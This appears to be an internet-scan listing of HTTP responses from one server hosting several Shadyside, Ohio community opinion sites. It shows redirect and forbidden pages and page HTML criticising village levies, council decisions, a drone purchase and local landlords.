    server: LiteSpeed
    cache-control: no-cache, no-store, must-revalidate, max-age=0
    location: https://www.shadysideoh.net/
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  302 Found
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 302 Found
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Found
    </h2>
    <p>The document has been temporarily moved.</p>
    </div></div></body></html>
    
    Found 2026-01-08 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.shadysideoh.net

    2026-01-08 05:15

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Wed, 07 May 2025 03:48:15 GMT
    accept-ranges: bytes
    content-length: 8930
    date: Thu, 08 Jan 2026 05:15:30 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Home
    
    <!DOCTYPE html>
    <html>
    
    <!-- #BeginTemplate "dwt/site.dwt" -->
    
    <head>
    <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
    <!-- #BeginEditable "doctitle" -->
    <title>Home</title>
    <!-- #EndEditable -->
    <!-- #BeginEditable "headsection" -->
    <meta content="Another blog about Shadyside" name="description" />
    <meta content="Shadyside" name="keywords" />
    <style type="text/css">
    
    .newStyle1 {
    	font-family: "Comic Sans MS";
    }
    </style>
    
    <!-- #EndEditable -->
    <meta content="en-us" http-equiv="Content-Language" />
    <meta content="General" name="rating" />
    <meta content="no" http-equiv="imagetoolbar" />
    <meta content="Copyright © 2018, ShadysideOh.com/. All Rights Reserved" name="copyright" />
    <link href="styles/site.css" rel="stylesheet" type="text/css" />
    </head>
    
    <body>
    
    <!-- Page Container begins here -->
    <div id="outerWrapper">
    	<!-- Masthead begins here -->
    	<div id="header">
    		<h1 class="title">ShadysideOh.net</h1>
    			
    		<img alt="Man in T-shirt" class="image" height="101" src="images/figure_in_custom_shirt_19367.png" width="103" /></div>
    	<!-- Masthead ends here -->
    	<!-- Navigation begins here -->
    	<div id="topNavigation">
    		<ul>
    			<li><a href="Default.html">Home</a></li>
    			<!--li><a href="../about.html" title="About">About</a></li-->
    			<!--li><a href="../contact.html" title="Contact">Contact</a></li-->
    			<!--li><a href="../links.html" title="Links">Links</a></li-->
    			<!--li><a href="../search.html" title="Search My Site.">Search</a></li-->
    			<!--li><a href="../site-map.html" title="Site Map">Site Map</a></li-->
    		</ul>
    	</div>
    	<!-- Navigation ends here -->
    	<!-- Content Container begins here -->
    	<div id="contentWrapper">
    		<!-- Left Column begins here -->
    		<div id="leftColumn1">
    		<!-- #BeginEditable "ltcontent" -->	
    		<p></p>
    		<p style="text-align:center">
    					<a href="https://www.shadysideoh.org">
    					<img alt="Lemmings" src= "images/cliff_jump.gif" height="86" width="100" class="auto-style2"/></a></p>
    					<h4 class="CenterText"><a href="https://www.shadysideoh.org">Shadyside Lemmings</a></h4>
    		<p class="CenterText">A comment about the Levy passed in November.</p>
    		<p></p>
    			<!-- #EndEditable -->
    		</div>
    		<!-- Left Column ends here -->
    		<!-- Right Column begins here -->
    		<div id="rightColumn1">			
    		<!-- #BeginEditable "rtcontent" -->		
    		  <div>
    			<div style="text-align:center" ><img alt="reading paper" src="images/on_the_toilet_400_clr_6456.png" height="151" width="152"/></div>
    			<h2 style="text-align:center;padding-top:10px;padding-bottom:10px">Subscribe</h2>
    			<div class="newsletter" style="width: 198px"><p style="font-size:small;padding-left:3px;padding-right:3px">
    				It's here!. Subscribe to our 
    				newsletter and get the latest news directly in your inbox.</p>
    				<div style="text-align:center">
    					<button id="myBtn" >Subscribe</button>
    				</div>
    				<p>Click the 'Subscribe' button above. You will be taken to the 
    				site to subscribe. </p>
    			</div>
    			
    			<p></p>
    			<div style="text-align:center">
    				<p>Visit our sister sites.</p>
    				<a href="https://www.shadysideoh.org">
    					<img alt="Banner" src="images/talia_open_roller_banner_21398-2.gif" height="122" width="92" /></a>
    				<p style="font-weight:bold"><a style="color:orange" href="https://www.shadysideoh.org">ShadysideOh.org</a></p>
    			</div>
    			<p></p>
    			<div style="text-align:center">
    				<a href="https://www.shadysideoh.com">
    					<img alt="Writing" src="images/stick_figure_writing_with_black_pen_10885.png" height="205" width="154"/></a>
    				<p style="font-weight:bold"><a style="color:orange" href="https://www.shadysideoh.com">ShadysideOh.com</a></p>
    			</div>
    			<p></p>			
    			<div style="text-align:center">
    				<a href="https://www.shadyside43947.com">
    					<img alt="Street Sign" src="images/woman_construction_sign_19754-3.png" height="176" width="161"/></a>
    				<p style="font-weight:bold"><a style="color:orange" href="https://www.shadyside43947.com">Shadyside43947.com</a></p>
    			</div>
    		  </div>
    			
    			
    				
    			<!-- #EndEditable -->
    		</div>
    		<!-- Right Column ends here -->
    		<!-- Main Content begins
    Found 2026-01-08 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · www.shadysideoh.net

    2026-01-08 05:15

    HTTP/1.1 302 Found
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 771
    date: Thu, 08 Jan 2026 05:15:30 GMT
    server: LiteSpeed
    cache-control: no-cache, no-store, must-revalidate, max-age=0
    location: https://www.shadysideoh.net/
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  302 Found
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 302 Found
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Found
    </h2>
    <p>The document has been temporarily moved.</p>
    </div></div></body></html>
    
    Found 2026-01-08 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · www.rudalhitam.online

    2026-01-07 10:14

    HTTP/1.1 403 Forbidden
    keep-alive: timeout=5, max=100
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 1242
    date: Wed, 07 Jan 2026 10:14:04 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  403 Forbidden
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 403 Forbidden
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">403</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Forbidden
    </h2>
    <p>Access to this resource on the server is denied!</p>
    </div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;">
    <br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>
    
    Found 2026-01-07 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · rudalhitam.online

    2026-01-07 10:14

    HTTP/1.1 403 Forbidden
    keep-alive: timeout=5, max=100
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 1242
    date: Wed, 07 Jan 2026 10:14:03 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  403 Forbidden
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 403 Forbidden
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">403</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Forbidden
    </h2>
    <p>Access to this resource on the server is denied!</p>
    </div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;">
    <br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>
    
    Found 2026-01-07 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.rudalhitam.online

    2026-01-07 10:14

    HTTP/1.1 403 Forbidden
    keep-alive: timeout=5, max=100
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 1242
    date: Wed, 07 Jan 2026 10:14:04 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  403 Forbidden
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 403 Forbidden
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">403</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Forbidden
    </h2>
    <p>Access to this resource on the server is denied!</p>
    </div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;">
    <br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>
    
    Found 2026-01-07 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · rudalhitam.online

    2026-01-07 10:14

    HTTP/1.1 403 Forbidden
    keep-alive: timeout=5, max=100
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 1242
    date: Wed, 07 Jan 2026 10:14:03 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  403 Forbidden
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 403 Forbidden
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">403</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Forbidden
    </h2>
    <p>Access to this resource on the server is denied!</p>
    </div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;">
    <br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>
    
    Found 2026-01-07 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.shadysideoh.com

    2026-01-07 05:16

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Wed, 07 May 2025 12:28:51 GMT
    accept-ranges: bytes
    content-length: 14297
    date: Wed, 07 Jan 2026 05:16:49 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: ShadysideOh
    
    <!DOCTYPE html>
    <html>
    
    <head>
    <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
    <title>ShadysideOh</title>
    <link rel="stylesheet" href="styles/owl.carousel.min.css">
    <link rel="stylesheet" href="styles/owl.theme.default.min.css">
    <link href="styles/style2.css" rel="stylesheet" type="text/css" />
    <style type="text/css">
    .auto-style1 {
    	color: #5F8EA9;
    	text-decoration: underline;
    }
    .auto-style2 {
    	margin-left: 0px;
    }
    .auto-style3 {
    	margin-top: 72px;
    }
    </style>
    </head>
    
    <body>
    
    <!-- Begin Container -->
    <div id="container">
    	<!-- Begin Masthead -->
    	<div id="masthead">
    		<h1 style="color: #FF8000">ShadysideOh.com</h1>
    		<h3>Shadyside, Ohio 43947</h3>
    	</div>
    	<!-- End Masthead -->
    	<!-- Begin Navigation -->
    	<div id="navigation">
    		<ul>
    			<li><a href="index.html">Home</a></li>
    			<li><a href="about/about.htm">About</a></li>
    			<li><a href="news/news.htm">News</a></li>
    			<li><a href="calendar/calendar.htm">Calendar</a></li>
    			<li><a href="photo_gallery/photo_gallery.htm">Photo Gallery</a></li>
    			<li><a href="information_links/information_links.htm">Links</a></li>
    			<li><a href="faq/faq.htm">FAQ</a></li>
    			<li><a href="contact/contact.htm">Contact</a></li>
    			<li><a href="history/history.htm">History</a></li>
    			<li><a href="comments/comments_copy(1).htm">Comments</a></li>
    			<li><a href="archive/archive.html">Archives</a></li>
    
    		</ul>
    		<p></p>
    		
    		
    	</div>
    	<!-- End Navigation -->
    	<!-- Begin Content -->
    	<div id="content" style="height: 1387px">
    		<img alt="" height="336" src="images/stick_figure_writing_with_black_pen_10885.png" width="342" />
    		<h2>Our Town</h2>
    		<div style="margin-bottom:20px;height:526px; border-bottom-style:solid">
    		
    			<img alt="Happy Holidays" src="images/cart_before_horse_22579-2.png" height="126" width="191">
    			<h3>Putting the Cart Before the Horse</h3>		
    			<p>Shadyside school superintendent Haswell appeared at council 
    			wanting the deed to the Hillview area. The proposed new school has 
    			not even went to a vote yet. Someone appears to be putting the cart 
    			before the horse. </p>
    			
    			<div>			
    				<img alt="Question" src="images/drone_follow_surveillance_anim_300_clr_17448.gif" height="134" width="133"><br>
    					<h2>Village Buys $14,000 Drone!!</h2>
    					<p>The Village can't operate the Pauline Swamburg sign, so 
    					how are they going to fly an overpriced drone. 
    					</p>									
    			</div>
    			
    		<div style="height: 375px" class="auto-style3">			
    			<div style="height: 260px; border:thin black solid;padding:3px;width:80%;margin-left:auto;margin-right:auto">
    				<div class="owl-carousel">
      					<div style="width:100%;height:250px"><div><img alt="Money House" src="images/money_house_pc_400_clr_1823.png" height="200px" width="100%" /></div>
    					<h4>Overpriced Shacks - Premium Price for bare minimum</h4> </div>
      					<div style="width:100%;height:250px"> <div></div><img alt="Apartment" src="images/38Lincoln.png" height="200px" width="100%" /><h2>These Look a lot like...</h2> </div>				  				
      					<div style="width:100%;height:250px"> <div><img alt="Internment Camp" src="images/internment.png" height="200px" width="100%" /></div>
    					<h2>These! (Internment Camp)</h2> </div>  					
    					<div style="width:100%;height:250px"> <div></div><img alt="Apartment" src="images/41stAptLSide.png" height="200px" width="100%" /><h2>Where's the yards?</h2> </div>				  				
      					<div style="width:100%;height:250px"> <div></div><img alt="Apartment" src="images/41stAptFront.png" height="200px" width="100%" /><h2>Kitchen and Front room all one across front</h2> </div>
      					<div style="width:100%;height:250px"> <div></div><img alt="Apartment" src="images/41stAptSide.png" height="200px" width="100%" /><h2>Firetrap? No Back door!</h2> </div>				  					  				
      					<div style="width:100%;height:250px"> <div></div><img alt="Apartment" src="images/43rdAptSide.png" height="200px" width="100%" /><h2>Just Lipstick on a Pig</h2> </div>				  				
    					
    				</div>
    			</div>
    					
    				<h3><a href="Articles/slumlord.html">Shadyside's Slum Lords</a></h3>		
    				<p>A local slum lo
    Found 2026-01-07 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · www.shadysideoh.com

    2026-01-07 05:16

    HTTP/1.1 302 Found
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 771
    date: Wed, 07 Jan 2026 05:16:49 GMT
    server: LiteSpeed
    cache-control: no-cache, no-store, must-revalidate, max-age=0
    location: https://www.shadysideoh.com/
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  302 Found
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 302 Found
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Found
    </h2>
    <p>The document has been temporarily moved.</p>
    </div></div></body></html>
    
    Found 2026-01-07 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · shadysideoh.com

    2026-01-07 05:16

    HTTP/1.1 302 Found
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 771
    date: Wed, 07 Jan 2026 05:16:49 GMT
    server: LiteSpeed
    cache-control: no-cache, no-store, must-revalidate, max-age=0
    location: https://www.shadysideoh.com/
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  302 Found
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 302 Found
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Found
    </h2>
    <p>The document has been temporarily moved.</p>
    </div></div></body></html>
    
    Found 2026-01-07 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · shadysideoh.com

    2026-01-07 05:16

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Wed, 07 May 2025 12:28:51 GMT
    accept-ranges: bytes
    content-length: 14297
    date: Wed, 07 Jan 2026 05:16:49 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: ShadysideOh
    
    <!DOCTYPE html>
    <html>
    
    <head>
    <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
    <title>ShadysideOh</title>
    <link rel="stylesheet" href="styles/owl.carousel.min.css">
    <link rel="stylesheet" href="styles/owl.theme.default.min.css">
    <link href="styles/style2.css" rel="stylesheet" type="text/css" />
    <style type="text/css">
    .auto-style1 {
    	color: #5F8EA9;
    	text-decoration: underline;
    }
    .auto-style2 {
    	margin-left: 0px;
    }
    .auto-style3 {
    	margin-top: 72px;
    }
    </style>
    </head>
    
    <body>
    
    <!-- Begin Container -->
    <div id="container">
    	<!-- Begin Masthead -->
    	<div id="masthead">
    		<h1 style="color: #FF8000">ShadysideOh.com</h1>
    		<h3>Shadyside, Ohio 43947</h3>
    	</div>
    	<!-- End Masthead -->
    	<!-- Begin Navigation -->
    	<div id="navigation">
    		<ul>
    			<li><a href="index.html">Home</a></li>
    			<li><a href="about/about.htm">About</a></li>
    			<li><a href="news/news.htm">News</a></li>
    			<li><a href="calendar/calendar.htm">Calendar</a></li>
    			<li><a href="photo_gallery/photo_gallery.htm">Photo Gallery</a></li>
    			<li><a href="information_links/information_links.htm">Links</a></li>
    			<li><a href="faq/faq.htm">FAQ</a></li>
    			<li><a href="contact/contact.htm">Contact</a></li>
    			<li><a href="history/history.htm">History</a></li>
    			<li><a href="comments/comments_copy(1).htm">Comments</a></li>
    			<li><a href="archive/archive.html">Archives</a></li>
    
    		</ul>
    		<p></p>
    		
    		
    	</div>
    	<!-- End Navigation -->
    	<!-- Begin Content -->
    	<div id="content" style="height: 1387px">
    		<img alt="" height="336" src="images/stick_figure_writing_with_black_pen_10885.png" width="342" />
    		<h2>Our Town</h2>
    		<div style="margin-bottom:20px;height:526px; border-bottom-style:solid">
    		
    			<img alt="Happy Holidays" src="images/cart_before_horse_22579-2.png" height="126" width="191">
    			<h3>Putting the Cart Before the Horse</h3>		
    			<p>Shadyside school superintendent Haswell appeared at council 
    			wanting the deed to the Hillview area. The proposed new school has 
    			not even went to a vote yet. Someone appears to be putting the cart 
    			before the horse. </p>
    			
    			<div>			
    				<img alt="Question" src="images/drone_follow_surveillance_anim_300_clr_17448.gif" height="134" width="133"><br>
    					<h2>Village Buys $14,000 Drone!!</h2>
    					<p>The Village can't operate the Pauline Swamburg sign, so 
    					how are they going to fly an overpriced drone. 
    					</p>									
    			</div>
    			
    		<div style="height: 375px" class="auto-style3">			
    			<div style="height: 260px; border:thin black solid;padding:3px;width:80%;margin-left:auto;margin-right:auto">
    				<div class="owl-carousel">
      					<div style="width:100%;height:250px"><div><img alt="Money House" src="images/money_house_pc_400_clr_1823.png" height="200px" width="100%" /></div>
    					<h4>Overpriced Shacks - Premium Price for bare minimum</h4> </div>
      					<div style="width:100%;height:250px"> <div></div><img alt="Apartment" src="images/38Lincoln.png" height="200px" width="100%" /><h2>These Look a lot like...</h2> </div>				  				
      					<div style="width:100%;height:250px"> <div><img alt="Internment Camp" src="images/internment.png" height="200px" width="100%" /></div>
    					<h2>These! (Internment Camp)</h2> </div>  					
    					<div style="width:100%;height:250px"> <div></div><img alt="Apartment" src="images/41stAptLSide.png" height="200px" width="100%" /><h2>Where's the yards?</h2> </div>				  				
      					<div style="width:100%;height:250px"> <div></div><img alt="Apartment" src="images/41stAptFront.png" height="200px" width="100%" /><h2>Kitchen and Front room all one across front</h2> </div>
      					<div style="width:100%;height:250px"> <div></div><img alt="Apartment" src="images/41stAptSide.png" height="200px" width="100%" /><h2>Firetrap? No Back door!</h2> </div>				  					  				
      					<div style="width:100%;height:250px"> <div></div><img alt="Apartment" src="images/43rdAptSide.png" height="200px" width="100%" /><h2>Just Lipstick on a Pig</h2> </div>				  				
    					
    				</div>
    			</div>
    					
    				<h3><a href="Articles/slumlord.html">Shadyside's Slum Lords</a></h3>		
    				<p>A local slum lo
    Found 2026-01-07 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · www.shadyside43947.com

    2026-01-07 05:16

    HTTP/1.1 302 Found
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 771
    date: Wed, 07 Jan 2026 05:16:25 GMT
    server: LiteSpeed
    cache-control: no-cache, no-store, must-revalidate, max-age=0
    location: https://www.shadyside43947.com/
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  302 Found
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 302 Found
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Found
    </h2>
    <p>The document has been temporarily moved.</p>
    </div></div></body></html>
    
    Found 2026-01-07 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · shadyside43947.com

    2026-01-07 05:16

    HTTP/1.1 302 Found
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 771
    date: Wed, 07 Jan 2026 05:16:25 GMT
    server: LiteSpeed
    cache-control: no-cache, no-store, must-revalidate, max-age=0
    location: https://www.shadyside43947.com/
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  302 Found
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 302 Found
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Found
    </h2>
    <p>The document has been temporarily moved.</p>
    </div></div></body></html>
    
    Found 2026-01-07 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.shadyside43947.com

    2026-01-07 05:16

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Sun, 09 Nov 2025 07:11:10 GMT
    accept-ranges: bytes
    content-length: 7974
    date: Wed, 07 Jan 2026 05:16:25 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Home
    
    <!DOCTYPE html>
    <html>
    
    <!-- #BeginTemplate "master.dwt" -->
    
    <head>
    <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
    <!-- #BeginEditable "doctitle" -->
    <title>Home</title>
    <meta content="Shadyside, Ohio 43947" name="keywords">
    <meta content="Shadyside, Ohio" name="description">
    <!-- #EndEditable -->
    <link href="styles/style0.css" media="screen" rel="stylesheet" title="CSS" type="text/css" />
    <style type="text/css">
    .auto-style1 {
    	font-size: large;
    }
    </style>
    </head>
    
    <body>
    <div id="container">
    <div id="lftcontainer" style="width: 169px; height: 244px">
    	<img src="images/custom_corner_street_sign.png" alt="Street sign" width="179" style="padding-top:20px" height="149"/>
    	<br><br><p class="auto-style1">shadyside43947.com</p>
    	</div>
    <!-- Begin Container -->
    <div id="rtcontainer">
    	<!-- Begin Masthead -->
    	<div id="masthead" style="height: 302px">
    		<div id="videobox" style="width:100%;height:109%" class="centercontent">
    		
    			<img alt="Bailing boat" height="283" src="images/doing_all_the_work_21647.gif" width="444"></div>
    	</div>
    	<!-- End Masthead -->
    	<!-- Begin Navigation -->
    	<div id="navigation">
    		<ul>
    			<li><a href="https://www.shadysideoh.com">Home</a></li>
    			<!--li><a href="about_me/default.html">About Me</a></li-->
    			<!--li><a href="resume/default.html">R&eacute;sum&eacute;</a></li-->
    			<!--li><a href="photo_gallery/default.html">Photo Gallery</a></li-->
    			<!--li><a href="links/default.html">Links</a></li-->
    			<!--li><a href="contact/default.html">Contact</a></li-->
    		</ul>
    	</div>
    	<!-- End Navigation -->
    	<!-- Begin content_container -->
    	<div id="content_container">
    		<!-- Begin Left Column -->
    		<div id="column_left">
    			<!-- #BeginEditable "content" -->
    			
    		<div id="column_left0">
    
    			<div class="centercontent">			
    				<h2 >New Levi defeated</h2>
    				<h3 >Levi goes up in Smoke!</h3>
    				<p style="text-align:center">
    				<img alt="Up in Smoke" src="images/explosion_300_clr_8784.gif" height="220" width="220"  ></p>
    				<p style="text-align:left">In the November 4, 2025 Shadyside Village election, it has been reported that the new levi was defeated  
    				soundly by 317 votes for and 614 against. While most of the village's levis pass by a 60/40 margin, this one only had a 34% approval rating. 
    				Over 65% of the electorate finally opened their eyes to the constant begging for more money.  </p>
    					   				
    				<p style="text-align:left">The village had two other renewal levis on the same ballot. Adding a new request for money while asking to 
    				renew two others was rather foolish. Maybe they wanted to get ahead of the state in the state's attempts to restrict property taxes. </p>
    				<p >&nbsp;</p>
    			</div>
    
    			
    			<div class="centercontent">			
    				<h2 >Swimming Pool Gutted?</h2>
    				<h3 >Tim Merryman and Council Canabalizes Swimming Pool</h3>
    				<p style="text-align:center">
    				<img alt="Swim" src="images/stick_figure_treading_water_150_wht_6482.gif" height="218" width="273"  ></p>
    				<p style="text-align:left">In the April 22, 2019 Shadyside Village Council report, it has been reported that councilman Tim Merryman proposed, and had approved, that the swimming pool 
    					be canabalized and given away. Powhatan had expressed an interest in equipment at our pool. The equipment appears to be given away for free to Powhatan by council. 
    					It’s a sign that the council is definitely planning on giving everything there away and forcing a new school upon us.    </p>
    				<p >&nbsp;</p>
    			</div>
    			
    			<!--div class="centercontent">
    			<h2 class="centercontent">Water Prices Rise Again&nbsp;</h2>
    			<h3 class="centercontent">Going From $30 to $54</h3>
    			<p style="text-align:center">
